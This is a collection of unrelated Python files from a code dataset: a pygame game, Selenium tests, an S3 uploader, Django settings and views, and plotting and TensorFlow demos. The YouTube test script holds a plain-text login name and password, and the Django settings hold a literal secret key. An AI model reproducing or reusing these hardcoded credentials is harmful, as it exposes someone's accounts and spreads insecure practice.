+{"seq_id":"464550661","text":"import sys\nimport pygame as pg\nfrom .. import tools, collision\nfrom .. import constants as c\nfrom .. components import actors, portal\nfrom .. import tilerender\nfrom .. import setup\nfrom . import generic_menu\n\nclass LevelState(tools._State):\n\tdef __init__(self, name):\n\t\tsuper(LevelState, self).__init__()\n\t\tself.name = name\n\t\tself.portal = None\n\t\tself.tmx_map = setup.TMX[name]\n\n\tdef startup(self, game_data):\n\t\t\"\"\"Initialize the State object when flipped\"\"\"\n\t\tself.game_screen = pg.display.get_surface()\n\t\tself.game_data = game_data\n\t\tself.state = 'transition_in'\n\t\tself.allow_input = False\n\t\tself.renderer = tilerender.Renderer(self.tmx_map)\n\t\tself.map_image = self.renderer.make_map()\n\n\t\tself.viewport = self.make_viewport(self.map_image)\n\t\tself.level_surface = self.make_level_surface(self.map_image)\n\t\tself.level_rect = self.level_surface.get_rect()\n\t\tself.player = self.make_player()\n\t\tself.blockers = self.make_blockers()\n\t\tself.sprites = self.make_sprites()\n\t\tself.portals = self.make_level_portals()\n\n\t\tself.collision_handler = collision.CollisionHandler(self.player, self.blockers, self.sprites, self.portals, self)\n\n\t\tself.state_dict = self.make_state_dict()\n\t\tself.transition_rect = setup.SCREEN.get_rect()\n\t\tself.menu_screen = generic_menu.Player_menu(game_data, self)\n\t\tself.transition_alpha = 255\n\n\t\tself.use_portal = False\n\n\tdef make_viewport(self, map_image):\n\t\t\"\"\"Create viewport\"\"\"\n\t\tmap_rect = map_image.get_rect()\n\t\treturn setup.SCREEN.get_rect(bottom=map_rect.bottom)\n\n\tdef make_level_surface(self, map_image):\n\t\t\"\"\"\n\t\tCreate the surface all images are blitted to.\n\t\t\"\"\"\n\t\tmap_rect = map_image.get_rect()\n\t\tmap_width = map_rect.width\n\t\tmap_height = map_rect.height\n\t\tsize = map_width, map_height\n\n\t\treturn pg.Surface(size).convert()\n\n\tdef make_player(self):\n\t\t\"\"\"\n\t\tMake the player and sets location.\n\t\t\"\"\"\n\t\tlast_state = self.previous\n\n\t\tfor object in self.renderer.tmx_data.getObjects():\n\t\t\tproperties = object.__dict__\n\t\t\tif properties['name'] == 'start point':\n\t\t\t\tif last_state == properties['state']:\n\t\t\t\t\tposx = properties['x']\n\t\t\t\t\tposy = properties['y'] - properties['height']\n\t\t\t\t\tplayer = actors.Player(properties['direction'],\n\t\t\t\t\t self.game_data)\n\t\t\t\t\tplayer.rect.x = posx\n\t\t\t\t\tplayer.rect.y = posy\n\n\t\treturn player\n\n\tdef make_state_dict(self):\n\t\t\"\"\"\n\t\tMake a dictionary of states the level can be in.\n\t\t\"\"\"\n\t\tstate_dict = {'normal': self.running_normally,\n\t\t #'dialogue': self.handling_dialogue,\n\t\t 'menu': self.goto_menu,\n\t\t 'transition_in': self.transition_in,\n\t\t 'transition_out': self.transition_out}\n\t\t #'slow transition out': self.slow_fade_out}\n\n\t\treturn state_dict\n\n\tdef make_blockers(self):\n\t\t\"\"\"\n Make the blockers for the level.\n \"\"\"\n\t\tblockers = []\n\n\t\tfor object in self.renderer.tmx_data.getObjects():\n\t\t\tproperties = object.__dict__\n\t\t\tif properties['name'] == 'blocker':\n\t\t\t\tleft = properties['x']\n\t\t\t\ttop = properties['y']\n\t\t\t\tblocker = pg.Rect(left, top, properties['width'], properties['height'])\n\t\t\t\tblockers.append(blocker)\n\n\t\treturn blockers\n\n\tdef make_sprites(self):\n\t\tsprites = []\n\t\treturn sprites\n\n\tdef make_level_portals(self):\n\t\tportal_group = pg.sprite.Group()\n\n\t\tfor object in 
self.renderer.tmx_data.getObjects():\n\t\t\tproperties = object.__dict__\n\t\t\tif properties['name'] == 'portal':\n\t\t\t\tposx = properties['x']\n\t\t\t\tposy = (properties['y']) - properties['height']\n\t\t\t\tnew_state = properties['type']\n\t\t\t\tportal_group.add(portal.Portal(posx, posy, new_state))\n\n\t\treturn portal_group\n\n\tdef check_for_portals(self):\n\t\tif self.use_portal and not self.done:\n\t\t\tself.player.location = self.player.get_tile_location()\n\t\t\tself.next = self.portal\n\t\t\tself.state = 'transition_out'\n\n\tdef running_normally(self, surface, keys):\n\t\tself.player.update(keys)\n\t\tself.collision_handler.update(keys)\n\t\tself.check_for_portals()\n\t\tself.check_for_menu(keys)\n\t\tself.viewport_update()\n\t\tself.draw_level(surface)\n\n\tdef check_for_menu(self, keys):\n\t\tif keys[pg.K_RETURN] and self.allow_input:\n\t\t\tif self.player.state == 'resting':\n\t\t\t\tself.state = 'menu'\n\t\t\t\tself.allow_input = False\n\n\t\tif not keys[pg.K_RETURN]:\n\t\t\tself.allow_input = True\n\n\tdef goto_menu(self, surface, keys, *args):\n\t\tself.menu_screen.update(surface, keys)\n\t\tself.menu_screen.draw(surface)\n\n\tdef transition_out(self, surface, *args):\n\t\t\"\"\"\n\t\tTransition level to new scene.\n\t\t\"\"\"\n\t\ttransition_image = pg.Surface(self.transition_rect.size)\n\t\ttransition_image.fill(c.TRANSITION_COLOR)\n\t\ttransition_image.set_alpha(self.transition_alpha)\n\t\tself.draw_level(surface)\n\t\tsurface.blit(transition_image, self.transition_rect)\n\t\tself.transition_alpha += c.TRANSITION_SPEED\n\t\tif self.transition_alpha >= 255:\n\t\t\tself.transition_alpha = 255\n\t\t\tself.done = True\n\n\tdef transition_in(self, surface, *args):\n\t\t\"\"\"\n\t\tTransition into level.\n\t\t\"\"\"\n\t\tself.viewport_update()\n\t\ttransition_image = pg.Surface(self.transition_rect.size)\n\t\ttransition_image.fill(c.TRANSITION_COLOR)\n\t\ttransition_image.set_alpha(self.transition_alpha)\n\t\tself.draw_level(surface)\n\t\tsurface.blit(transition_image, self.transition_rect)\n\t\tself.transition_alpha -= c.TRANSITION_SPEED\n\t\tif self.transition_alpha <= 0:\n\t\t\tself.state = 'normal'\n\t\t\tself.transition_alpha = 0\n\n\tdef update(self, surface, keys):\n\t\t\"\"\"\n\t\tUpdate state.\n\t\t\"\"\"\n\t\tstate_function = self.state_dict[self.state]\n\t\tstate_function(surface, keys)\n\n\tdef viewport_update(self):\n\t\t\"\"\"\n\t\tUpdate viewport so it stays centered on character,\n\t\tunless at edge of map.\n\t\t\"\"\"\n\t\tself.viewport.center = self.player.rect.center\n\t\tself.viewport.clamp_ip(self.level_rect)\n\n\tdef draw_level(self, surface):\n\t\t\"\"\"\n\t\tBlit all images to screen.\n\t\t\"\"\"\n\t\tself.game_screen.fill(c.BLACK)\n\t\tself.level_surface.blit(self.map_image, self.viewport, self.viewport)\n\t\tself.level_surface.blit(self.player.image, self.player.rect)\n\t\t#self.sprites.draw(self.level_surface)\n\n\t\tsurface.blit(self.level_surface, (0, 0), self.viewport)\n","sub_path":"data/states/levels.py","file_name":"levels.py","file_ext":"py","file_size_in_byte":5924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"639954297","text":"def send(self, command, prompt=None, answer=None, send_only=False):\n '\\n Sends the command to the device in the opened shell\\n '\n try:\n self._history.append(command)\n self._ssh_shell.sendall((b'%s\\r' % command))\n if send_only:\n return\n response = self.receive(command, prompt, answer)\n return to_text(response, errors='surrogate_or_strict')\n except (socket.timeout, AttributeError):\n display.vvvv(traceback.format_exc(), host=self._play_context.remote_addr)\n raise AnsibleConnectionFailure(('timeout trying to send command: %s' % command.strip()))","sub_path":"Data Set/bug-fixing-4/52c87c4691e3b04c53f4865b240510f31504a9a0--fix.py","file_name":"52c87c4691e3b04c53f4865b240510f31504a9a0--fix.py","file_ext":"py","file_size_in_byte":630,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"434856706","text":"a = []\r\nb = []\r\nflag = False\r\nwhile flag == False:\r\n num = int(input('Ingrese un valor: '))\r\n if num != -1:\r\n a.append(num)\r\n else:\r\n flag = True\r\n\r\nprint(a)\r\nfor i in range(len(a)):\r\n b.append(a[(len(a)-1) - i])\r\nprint(b)\r\n","sub_path":"Facultad Fundamentos/TP6/ejer5.py","file_name":"ejer5.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"280845637","text":"#!/software/VERSIONS/python2-2.7.6/bin/python\nimport sys,platform,time\ninputFiles = sys.argv[1]\ninputFilesList = inputFiles.split(',')\noutput = sys.argv[2]\nsleep = int(sys.argv[3])\njobName = sys.argv[4]\n#if len(sys.argv) > 3:\n# sleep = int(sys.argv[3])\n#else:\n# sleep = 1\ntime.sleep(sleep)\noutputLines = []\nfor iFile in inputFilesList:\n f = open(iFile,'r')\n lines = f.readlines()\n f.close()\n lines.insert(0,'Job['+jobName+'] Run on machine: '+str(platform.node())+'\\tSlept for '+str(sleep)+' seconds\\n')\n lines.insert(1,'---------------FILE '+iFile+' STARTED HERE---------------------\\n')\n lines.append('---------------FILE '+iFile+' ENDED HERE---------------------\\n\\n')\n outputLines.extend(lines)\nf = open(output,'w')\nf.writelines(outputLines)\nf.close()\n\n","sub_path":"example1/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"422682028","text":"from selenium import webdriver\nimport unittest\nimport time\nfrom HTMLTestRunner import HTMLTestRunner\n\nclass Baidu(unittest.TestCase):\n '''百度搜索测试'''\n def setUp(self):\n self.driver=webdriver.Chrome()\n self.driver.maximize_window()\n self.driver.implicitly_wait(10)\n self.base_url=\"http://www.baidu.com\"\n def test_baidu_search(self):\n '''搜索关键字 HTMLTestRunner'''\n driver=self.driver\n driver.get(self.base_url+\"/\")\n driver.find_element_by_id(\"kw\").clear()\n driver.find_element_by_id(\"kw\").send_keys('unittest')\n driver.find_element_by_id(\"su\").click()\n time.sleep(2)\n # title=driver.title\n # self.assertEqual(title,\"unittest_百度搜索\")\n def tearDown(self):\n self.driver.quit()\nif __name__==\"__main__\":\n unittest.main()\n # testunit=unittest.TestSuite()\n # testunit.addTest(Baidu(\"test_baidu_search\"))\n # #按照一定格式获取当前时间\n # now=time.strftime(\"%Y-%m-%d %H-%M-%S\")\n # #定义报告存放路径\n # filename='D:\\\\python自动化脚本\\\\test_project\\\\report\\\\'+now+' result.html'\n # fp=open(filename,'wb')\n # #定义测试报告\n # runner = HTMLTestRunner(stream=fp , \n # title = '百度搜索测试报告' , description = ' 用例执行情况:')\n # runner.run(testunit)#运行测试用例\n # fp.close()\n #代码分析:首先将htmltestrunner模块用import导入进来 2.通过open方法以二进制写模式代开当前目录下的result。html \n #如果没有则自动创建该文件,最后通过HTMLTestRunner的run()方法来运行测试套件中所组装的测试用例。最后通过close关闭测试报告文件\n\n","sub_path":"python/Test_RootFramwork/Test_case/test_baidu.py","file_name":"test_baidu.py","file_ext":"py","file_size_in_byte":1738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"519727867","text":"import os\nimport boto3\nimport base64\n\n# ------------------------------\n# CITS5503\n#\n# cloudstorage.py\n#\n# skeleton application to copy local files to S3\n#\n# Given a root local directory, will return files in each level and\n# copy to same path on S3\n#\n# ------------------------------ \n\n\nROOT_DIR = '.'\n# user name\nROOT_S3_DIR = '22302319-cloudcomputing'\n\ns3 = boto3.resource(\"s3\")\n\nbucket_config = {'LocationConstraint': 'ap-southeast-2'}\n\n\ndef upload_file(folder_name, file, file_name):\n # upload\n s3.meta.client.upload_file(file.replace(\"./\", \"\"), ROOT_S3_DIR,\n \"{}/{}\".format(folder_name.rstrip(\"/\"), file_name).replace(\"./\", \"\"))\n print(\"Uploading %s\" % file)\n\n\n# Main program\n# Insert code to create bucket if not there\ns3 = boto3.client('s3')\nbucket = s3.create_bucket(Bucket=ROOT_S3_DIR,\n CreateBucketConfiguration=bucket_config)\n\nif bucket.creation_date:\n print(\"The bucket exists\")\nelse:\n print(f\"The bucket does not exist, a new bucket {ROOT_S3_DIR} created\")\n\n# try:\n#\n# print(response)\n# except Exception as error:\n# pass\n\n\n# parse directory and upload files\n\nfor dir_name, subdir_list, file_list in os.walk(ROOT_DIR, topdown=True):\n if dir_name != ROOT_DIR:\n for fname in file_list:\n upload_file(\"%s/\" % dir_name[2:], \"%s/%s\" % (dir_name, fname), fname)\n\nprint(\"done\")\n","sub_path":"aws/lab03/cloudstorage.py","file_name":"cloudstorage.py","file_ext":"py","file_size_in_byte":1381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"263045583","text":"'''\nAuthor: your name\nDate: 2021-07-02 18:13:07\nLastEditTime: 2021-07-08 16:41:27\nLastEditors: Please set LastEditors\nDescription: In User Settings Edit\nFilePath: /genetic-drawing/3.py\n'''\nimport imageio\nimport os\nimport cv2\n'''\n# 只支持png格式,需要先命名排序好(默认按照字母序排列)\n# source(字符串):素材图片路径,生成的gif也保存在该路径\n# gifname(字符串):生成的gif的文件名,命名时带后缀如:'1.gif'\n# time(数字):生成的gif每一帧的时间间隔,单位(s)\n'''\ndef png2gif(source, gifname, time):\n #os.chdir(source) # os.chdir():改变当前工作目录到指定的路径\n file_list = os.listdir(source) # os.listdir():文件夹中的文件/文件夹的名字列表\n frames = [] #读入缓冲区\n file_list = sorted(file_list)\n for png in file_list:\n frames.append(imageio.imread(os.path.join(source,png)))\n imageio.mimsave(gifname, frames, 'GIF', duration=time)\n\ndef png2mp4(source, name):\n fps = 30 #FPS\n size=(958, 720) #图片、视频尺寸 w,h\n fourcc = cv2.VideoWriter_fourcc(*'mp4v')\n videoWriter = cv2.VideoWriter(name,fourcc,fps,size, True)\n file_list = os.listdir(source) # os.listdir():文件夹中的文件/文件夹的名字列表\n frames = [] #读入缓冲区\n file_list = sorted(file_list)\n if len(file_list) < 400:\n for png in file_list:\n frame = cv2.imread(os.path.join(source,png))\n videoWriter.write(frame)\n else:\n for i in range(len(file_list)):\n if i < 400:\n png = file_list[i]\n frame = cv2.imread(os.path.join(source,png))\n videoWriter.write(frame)\n else:\n if i%5==0:\n png = file_list[i]\n frame = cv2.imread(os.path.join(source,png))\n videoWriter.write(frame)\n videoWriter.release()\n\n \naddress = \"out\"\n#png2gif(address, '02.gif', 0.1)\npng2mp4(address, '03.mp4')\n","sub_path":"png2gif-mp4.py","file_name":"png2gif-mp4.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"243044380","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import manifold, datasets\nfrom Simulator import Simulator\nfrom PoincareMapper import PoincareMapper\nimport Equation\nimport math\nfrom scipy.integrate import odeint\nfrom FitzSimulator import FitzSimulator\nimport matplotlib.cm as cm\nimport matplotlib.colors as colors\n\n\nnewData = True\n\nif newData:\n fitz = FitzSimulator()\n print('Simulating system')\n data = fitz.states(duration = 200000, split = 0.1, rtol = 1.49012e-9, atol = 1.49012e-9)\n print('Interpolating curve')\n data = fitz.interpolateCurve()[1000:]\n\n np.savetxt('DataFitz.txt',data)\nelse:\n data = np.loadtxt('DataFitz.txt')\n\n# normalVector = np.array([0,0,1/math.sqrt(2),1/math.sqrt(2)]) # Includes extreme events\nnormalVector = np.array([1/math.sqrt(2),1/math.sqrt(2),0,0]) # Orthogonal to extreme events\n# normalVector = np.array([0,0,1,0])\n\nprint('Constructing Poincare section')\nmapper = PoincareMapper(normalVector,data)\npoincareSection = np.array(mapper.getValues())\ninterindxes = mapper.getIntersctIndx()\n\n\npoincareSection2 = np.array([point for point in poincareSection if(point[2]<0.1)])\n\nextremeEvents = []\nindex = []\nfor i,point in enumerate(poincareSection):\n if point[2] > 0.1:\n extremeEvents.append(i)\n else:\n index.append(i)\nextremeEvents = np.array(extremeEvents)\nprint('Number of extreme events = %g' % len(extremeEvents))\n\nprint(\"Computing LLE embedding of return map\")\nmanifoldOfPoincareSection, err = manifold.locally_linear_embedding(poincareSection2,n_neighbors=8,n_components=2,method = 'modified') # return map then manifold\nprint(\"Done. Reconstruction error: %g\" % err)\n\n## Fix colors for Plot\ncol = col = cm.get_cmap('plasma')\nnormdata = [np.linalg.norm(point) for point in poincareSection2]\nnormalize = colors.Normalize(vmin=min(normdata), vmax=max(normdata))\ndataColors = [col(normalize(value)) for value in normdata]\npoincColor = [dataColors[i] for i in range(0,len(poincareSection2))]\n\nprint('Plotting data')\nfig = plt.figure()\n\nax = fig.add_subplot(221)\nax.set_title('Oscillator 1')\nax.plot(data[:,0],data[:,2], alpha = 0.5)\nax.scatter(poincareSection2[:,0],poincareSection2[:,2],c = poincColor, alpha = 0.8)\n\nax = fig.add_subplot(222)\nax.set_title('Oscillator 2')\nax.plot(data[:,1],data[:,3], alpha = 0.5)\nax.scatter(poincareSection2[:,1],poincareSection2[:,3],c = poincColor, alpha = 0.8)\n\nax = fig.add_subplot(223)\nax.set_title('Reembedded Poincaré Section')\nax.scatter(manifoldOfPoincareSection[:,0],manifoldOfPoincareSection[:,1],c = poincColor)\nax.scatter(manifoldOfPoincareSection[extremeEvents-1,0],manifoldOfPoincareSection[extremeEvents-1,1],c = 'r')\n\nax = fig.add_subplot(224)\nax.set_title('Return map of reembedded Poincaré section')\nax.scatter(manifoldOfPoincareSection[:-1,0],manifoldOfPoincareSection[1:,0],c = poincColor[1:], s = 5)\nax.scatter(manifoldOfPoincareSection[extremeEvents,0],manifoldOfPoincareSection[extremeEvents+1,0], c = 'r')\n\n\nplt.show()\n","sub_path":"FitzSeparator.py","file_name":"FitzSeparator.py","file_ext":"py","file_size_in_byte":3006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"327291375","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom selenium import webdriver\r\nfrom selenium.webdriver.support.wait import WebDriverWait as wait\r\nfrom time import gmtime, strftime\r\nimport os.path\r\nfrom selenium.webdriver.common.action_chains import ActionChains\r\nimport time\r\nfrom selenium.common.exceptions import TimeoutException\r\n\r\ndef test_add_video_to_youtube(app):\r\n wd = app.wd\r\n actions = ActionChains(wd)\r\n \r\n # Login\r\n app.open_page(\"\")\r\n app.login(\"ua.sacred\", \"26661390\")\r\n \r\n # adding video and cheking of link\r\n wd.find_element_by_xpath(\"//a[@data-upsell='upload']\").click()\r\n video_file = os.path.normpath(os.path.join(os.path.dirname(os.path.abspath(__file__)), \"../resources/video/17_07_201613901.mp4\"))\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//input[@type='file']\")).send_keys(video_file)\r\n wait(wd, 30).until(lambda s: wd.find_element_by_xpath(\"//span[@class='progress-bar-text-done']\")).is_displayed()\r\n wait(wd, 60).until(lambda s: wd.find_element_by_xpath(\"//*[@id='active-uploads-contain']//*[contains(@class,'metadata-save-button')]//button\")).click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//input[@name='share_url']\")).is_displayed()\r\n\r\n \r\n # Check of adding video by name\r\n video_title = wd.find_element_by_xpath(\"//div[@class='item-title upload-cursor-pointer']\").text \r\n app.open_page(\"\")\r\n wd.find_element_by_xpath(\"//input[@name='search_query']\").click()\r\n #actions.send_keys(video_title).perform() - no text\r\n # add request to link\r\n app.open_page(\"results?search_query=17_07_201613901+\") \r\n i = 0 \r\n while i<9:\r\n try: \r\n wait(wd, 10).until(lambda s: wd.find_element_by_xpath(\"//a[contains(@href,'watch') and contains(.,'17_07_201613901')]\")).is_displayed()\r\n break\r\n except TimeoutException:\r\n app.open_page(\"results?search_query=17_07_201613901+\")\r\n i += 1\r\n assert wd.find_element_by_xpath(\"//a[contains(@href,'watch') and contains(.,'17_07_201613901')]\").is_displayed() \r\n \r\n # sw.lang.\r\n wd.find_element_by_xpath(\"//button[@id='yt-picker-language-button']\").click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//button//span[.='English (US)']\")).click()\r\n app.open_page(\"results?search_query=17_07_201613901+\")\r\n assert wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//span[@class='yt-uix-button-content' and .='Filters']\")).is_displayed()\r\n \r\n # Delete video\r\n app.open_page(\"my_videos?o=U\")\r\n wd.find_element_by_xpath(\"//button[contains(@class,'edit-expand')]\").click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//span[.='Delete']\")).click()\r\n wait(wd, 20).until(lambda s: wd.find_element_by_xpath(\"//span[.='Yes, delete']\")).click()\r\n #wd.close()\r\n \r\n","sub_path":"tests/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":2820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"228400627","text":"\"\"\"\nDjango settings for store project.\n\nFor more information on this file, see\nhttps://docs.djangoproject.com/en/1.10.5/topics/settings/\n\nFor the full list of settings and their values, see\nhttps://docs.djangoproject.com/en/1.10.5/ref/settings/\n\"\"\"\n\n# Build paths inside the project like this: os.path.join(BASE_DIR, ...)\nimport os , sys\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nPROJECT_ROOT = os.path.abspath(os.path.join(BASE_DIR, os.pardir))\n\n# Append Apps Folder to PYTHONPATH\nsys.path.append(os.path.join(BASE_DIR, 'apps'))\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = '#x8^)n$qwo@oy8=n%hz+ukdu*awuv8z03!!tpk(_3-u56i=)17'\n\nALLOWED_HOSTS = []\n# Application definition\n\nINSTALLED_APPS = (\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sites',\n 'easy_thumbnails',\n 'filer',\n 'mptt',\n 'crispy_forms',\n 'profiles',\n 'products',\n 'cart',\n 'checkout',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n)\n\nROOT_URLCONF = 'store.urls'\n\nWSGI_APPLICATION = 'store.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.sqlite3',\n 'NAME': 'db.sqlite3',\n 'HOST': '',\n 'USER': '',\n 'PASSWORD': '',\n 'PORT': ''\n }\n}\n\n# Internationalization\n# https://docs.djangoproject.com/en/1.10.5/topics/i18n/\n\nLANGUAGES = [\n ('en-us', 'English'),\n # ('cs-cz', 'Czech'),\n]\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'Europe/Prague'\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nUSE_TZ = True\n\n\n# Static files (CSS, JavaScript, Images)\n# https://docs.djangoproject.com/en/1.10.5/howto/static-files/\n\nSTATIC_URL = '/static/'\n# STATIC_ROOT = os.path.join(PROJECT_ROOT, 'staticfiles')\n\nMEDIA_URL = '/media/'\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n\nTEMPLATES = [\n {\n 'BACKEND': 'django.template.backends.django.DjangoTemplates',\n 'DIRS': [\n os.path.join(BASE_DIR, 'templates'),\n ],\n 'OPTIONS': {\n 'context_processors': [\n # Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this\n # list if you haven't customized them:\n 'django.contrib.auth.context_processors.auth',\n 'django.template.context_processors.debug',\n 'django.template.context_processors.i18n',\n 'django.template.context_processors.media',\n 'django.template.context_processors.static',\n 'django.template.context_processors.tz',\n 'django.template.context_processors.request',\n 'django.contrib.messages.context_processors.messages',\n 'cart.context_processors.cart_count_processor',\n ],\n 'loaders' : [\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n 'django.template.loaders.eggs.Loader',\n ]\n },\n },\n]\n\n\nSTATICFILES_DIRS = (\n os.path.join(BASE_DIR, 'static'),\n)\n\n# Easy Thumbnails Settings\nTHUMBNAIL_PROCESSORS = (\n 'easy_thumbnails.processors.colorspace',\n 'easy_thumbnails.processors.autocrop',\n 'filer.thumbnail_processors.scale_and_crop_with_subject_location',\n 'easy_thumbnails.processors.filters',\n)\n\nSITE_ID = 1\n\nCMS_PERMISSION = True\n\nAUTH_USER_MODEL = 
'profiles.Profile'\n\nCRISPY_TEMPLATE_PACK = 'bootstrap3'\n\nFILER_DEBUG = True\n\n# Addresses Types\nADDRESS_TYPE = (\n ('billing', 'Billing'),\n ('shipping', 'Shipping'),\n)\n\n# Orders Statuses\nORDER_STATUS_CHOICES = (\n ('created', 'Created'),\n ('in_progress', 'In Progress'),\n ('paid', 'Paid'),\n ('shipped', 'Shipped'),\n ('canceled', 'Cancelled'),\n)\n","sub_path":"store/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":4163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"496918276","text":"from django.shortcuts import render, redirect\nfrom app.models import DogProduct, Purchase, DogTag\nfrom django.contrib import messages\nfrom datetime import datetime\nfrom app.forms import NewDogTagForm\n# Create your views here.\n\ndef home(request):\n dog_products = DogProduct.objects.all()\n return render(request, \"home.html\", {\"dog_products\": dog_products})\n\n\ndef dog_product_detail(request, id):\n dog_product = DogProduct.objects.get(id=id)\n return render(request, \"dog_product_detail.html\", {\"dog_product\": dog_product})\n\n\ndef purchase_dog_product(request, id):\n dog_product = DogProduct.objects.get(id=id)\n if dog_product.quantity != 0:\n messages.success(request, f\"Purchased {dog_product.name}\")\n dog_product.quantity -= 1\n dog_product.save()\n purchase = Purchase.objects.create(dog_product=dog_product, purchased_at=datetime.now())\n return redirect(\"purchase_detail\", purchase.id)\n else:\n messages.error(request, f\"{dog_product.name} is out of stock\")\n return redirect(\"dog_product_detail\", dog_product.id)\n\n\ndef purchase_detail(request, id):\n purchase = Purchase.objects.get(id=id)\n return render(request, \"purchase_detail.html\", {\"purchase\":purchase})\n\n\ndef new_dog_tag(request):\n if request.method == \"GET\":\n return render(request, \"new_dog_tag.html\")\n elif request.method == \"POST\":\n form = NewDogTagForm(request.POST)\n if form.is_valid():\n owner_name = form.cleaned_data[\"owner_name\"]\n dog_name = form.cleaned_data[\"dog_name\"]\n dog_birthday = form.cleaned_data[\"dog_birthday\"]\n owner_address = form.cleaned_data[\"owner_address\"]\n dog_color = form.cleaned_data[\"dog_color\"]\n new_dog_tag = DogTag.objects.create(owner_name=owner_name, dog_name=dog_name, dog_birthday=dog_birthday,\n dog_color=dog_color, owner_address=owner_address)\n return redirect(\"dog_tag_list\")\n if not form.is_valid():\n return render(request, \"new_dog_tag.html\", {\"form\":form})\n\n\ndef dog_tag_list(request):\n dog_tags = DogTag.objects.all()\n return render(request, \"dog_tag_list.html\", {\"dog_tags\":dog_tags})","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"625922567","text":"#!/usr/bin/env python3.5\n''' Utilities to help with discord permissions.\n'''\n\ndef get_permissions_value():\n ''' Get a permissions value as an integer that can be inserted in a Discord URL to\n invite a bot to a server.\n '''\n permissions = (\n # 0x00000400 READ_MESSAGES\n (1 << 10) +\n # 0x00000800 SEND_MESSAGES\n (1 << 11) +\n # 0x00004000 EMBED_LINKS\n (1 << 14) +\n # 0x00020000 MENTION_EVERYONE\n (1 << 18) +\n # 0x00040000 USE_EXTERNAL_EMOJIS\n (1 << 19)\n )\n return permissions\n","sub_path":"lib/permissions.py","file_name":"permissions.py","file_ext":"py","file_size_in_byte":565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"2321217","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Oct 27 07:26:22 2018\n\n@author: xsxsz\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\ndef add_layer(inputs,in_size,out_size,activation_function=None):\n Weights=tf.Variable(tf.random_normal([in_size,out_size]))\n biases=tf.Variable(tf.zeros([1,out_size])+0.1)\n W=tf.matmul(inputs,Weights)+biases\n if activation_function is None:\n outputs=W\n else:\n outputs=activation_function(W)\n return outputs\n\nx_data=np.linspace(-1,1,300)[:,np.newaxis]\nnoise=np.random.normal(0,0.05,x_data.shape)\ny_data=np.square(x_data)+noise-0.5\nxs=tf.placeholder(tf.float32,[None,1])\nys=tf.placeholder(tf.float32,[None,1])\nl1=add_layer(xs,1,10,activation_function=tf.nn.relu)\nprediction=add_layer(l1,10,1,activation_function=None)\nloss=tf.reduce_mean(tf.reduce_sum(tf.square(ys-prediction),reduction_indices=[1]))\nstep=tf.train.GradientDescentOptimizer(0.1).minimize(loss)\ninit=tf.global_variables_initializer()\nwith tf.Session() as sess:\n sess.run(init)\n fig=plt.figure(figsize=(6,6))\n ax=fig.add_subplot(111)\n plt.title('Plot')\n plt.xlabel('X')\n plt.ylabel('Y')\n ax.scatter(x_data,y_data,alpha=0.7)\n plt.ion()\n for i in range(4000):\n sess.run(step,feed_dict={xs:x_data,ys:y_data})\n if i %50==0:\n #print(sess.run(loss,feed_dict={xs:x_data,ys:y_data}))\n try:\n ax.lines.remove(lines[0])\n except Exception:\n pass\n prediction_value=sess.run(prediction,feed_dict={xs:x_data,ys:y_data})\n lines=ax.plot(x_data,prediction_value,color='r',linewidth=4)\n saver=tf.train.Saver()\n saver.save(sess,'tensorflow_save/tensorflow_7') 